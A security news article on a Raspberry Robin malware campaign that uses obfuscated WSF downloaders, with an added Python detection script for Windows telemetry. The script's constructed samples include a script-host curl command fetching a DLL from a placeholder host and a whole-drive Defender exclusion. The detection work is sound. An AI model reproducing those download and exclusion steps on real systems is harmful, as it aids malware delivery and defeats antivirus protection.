New Raspberry Robin Malware Wave Exploits WSFs for Distribution, Evading Antivirus Detection
ICARO Media Group
In a recent discovery by cybersecurity researchers, a new wave of the Raspberry Robin malware campaign has been found, using malicious Windows Script Files (WSFs) as its propagation method since March 2024. This marks a shift from its previous distribution through USB drives, with the malware's distributors now experimenting with other initial infection vectors.
Patrick Schläpfer, a researcher at HP Wolf Security, states that Raspberry Robin, also known as QNAP worm, was first identified in September 2021. Since then, it has evolved into a downloader for various other payloads including SocGholish, Cobalt Strike, IcedID, BumbleBee, and TrueBot. Additionally, it has served as a precursor for ransomware attacks.
Originally, the malware was distributed via USB devices containing LNK files that retrieved the payload from a compromised QNAP device. However, it has now adopted new methods such as social engineering and malvertising to spread. The Raspberry Robin campaign is attributed to an emerging threat cluster tracked by Microsoft as Storm-0856, with links to notorious cybercriminal groups like Evil Corp, Silence, and TA505.
In the latest distribution vector, WSF files are being offered for download through various domains and subdomains. The details of how the attackers direct victims to these URLs remain unclear, but it is suspected that spam or malvertising campaigns play a role in luring unsuspecting users.
The WSF file in question is heavily obfuscated and functions as a downloader, retrieving the main DLL payload from a remote server using the curl command. Before it runs that payload, however, the script performs a series of anti-analysis and anti-virtual-machine checks to determine whether it is executing inside a sandbox or virtualized environment.
Furthermore, the malware is designed to terminate execution if the Windows operating system's build number is lower than 17063 (released in December 2017) or if antivirus processes associated with Avast, Avira, Bitdefender, Check Point, ESET, and Kaspersky are detected in the list of running processes. To evade detection, the malware also configures Microsoft Defender Antivirus exclusion rules, adding the entire main drive to the exclusion list and preventing it from being scanned.
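The two host-side behaviours described above, a script host spawning curl to fetch the DLL and a Defender exclusion covering an entire drive, are both visible in standard Windows telemetry. The following Python is an added example written for this page, not code from HP Wolf Security or from the campaign itself. It runs detection logic over constructed sample records that approximate Sysmon process-creation events and Defender "configuration changed" messages (Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log); the exact message wording, the field names and the sample values are assumptions chosen for illustration.

```python
import ntpath
import re
from typing import Dict, List

# --- Constructed sample telemetry (not real captures) -----------------------

# Approximation of Defender Event ID 5007 messages, which record configuration
# changes including new exclusion entries. The wording is illustrative only.
SAMPLE_DEFENDER_EVENTS: List[Dict] = [
    {"event_id": 5007,
     "message": r"Microsoft Defender Antivirus Configuration has changed. "
                r"New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = 0x0"},
    {"event_id": 5007,
     "message": r"Microsoft Defender Antivirus Configuration has changed. "
                r"New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\BackupTool\ = 0x0"},
    {"event_id": 5007,
     "message": r"Microsoft Defender Antivirus Configuration has changed. "
                r"New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\backup.exe = 0x0"},
    {"event_id": 1150, "message": "Endpoint Protection client is up and running in a healthy state."},
]

# Approximation of Sysmon Event ID 1 (process creation) records.
SAMPLE_PROCESS_EVENTS: List[Dict] = [
    {"parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "command_line": r"curl.exe -o C:\Users\Public\x.dll https://example.invalid/x"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "command_line": r"curl.exe https://example.invalid/health"},
    {"parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe"},
]

# --- Detection logic --------------------------------------------------------

# Captures the path portion of an "Exclusions\Paths\<path> = <value>" fragment.
EXCLUSION_PATH_RE = re.compile(r"Exclusions\\Paths\\(?P<path>[^=]+?)\s*=", re.IGNORECASE)
# A bare drive root such as "C:" or "C:\" (excluding a whole volume from scanning).
DRIVE_ROOT_RE = re.compile(r"^[A-Za-z]:\\?$")

# Windows Script Host binaries that execute .wsf/.vbs/.js files.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def drive_root_exclusions(events: List[Dict]) -> List[str]:
    """Return exclusion paths from 5007 events that cover an entire drive."""
    hits: List[str] = []
    for ev in events:
        if ev.get("event_id") != 5007:
            continue
        for match in EXCLUSION_PATH_RE.finditer(ev.get("message", "")):
            path = match.group("path").strip()
            if DRIVE_ROOT_RE.match(path):
                hits.append(path)
    return hits


def script_host_spawning_curl(events: List[Dict]) -> List[Dict]:
    """Return process-creation records where a script host launched curl.exe."""
    hits: List[Dict] = []
    for ev in events:
        # ntpath handles backslash separators regardless of the analysis host OS.
        parent = ntpath.basename(ev.get("parent_image", "")).lower()
        child = ntpath.basename(ev.get("image", "")).lower()
        if parent in SCRIPT_HOSTS and child == "curl.exe":
            hits.append(ev)
    return hits


def triage(defender_events: List[Dict], process_events: List[Dict]) -> Dict[str, int]:
    """Summarise how many of each suspicious behaviour was observed."""
    return {
        "drive_root_exclusions": len(drive_root_exclusions(defender_events)),
        "script_host_curl_downloads": len(script_host_spawning_curl(process_events)),
    }


if __name__ == "__main__":
    print("Whole-drive exclusions:", drive_root_exclusions(SAMPLE_DEFENDER_EVENTS))
    for hit in script_host_spawning_curl(SAMPLE_PROCESS_EVENTS):
        print("Script host -> curl:", hit["command_line"])
    print(triage(SAMPLE_DEFENDER_EVENTS, SAMPLE_PROCESS_EVENTS))
```

Either signal on its own has benign explanations (an administrator may legitimately add an exclusion, and curl ships with Windows), so in practice the two are best correlated on the same host within a short window; the whole-drive exclusion in particular is rarely legitimate and is worth an alert by itself.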
HP warns that the malicious WSF files are currently not flagged as harmful by any antivirus scanner on VirusTotal, highlighting how evasive the downloader is and the risk that it leads to a full Raspberry Robin infection. The heavy obfuscation of the WSF downloader both hinders detection and slows analysis.
As cybersecurity researchers continue their investigations, it is crucial for users and organizations to remain vigilant, keep their systems and software updated, and exercise caution when downloading files or clicking on suspicious links to mitigate the risk of falling victim to this evolving Raspberry Robin malware campaign.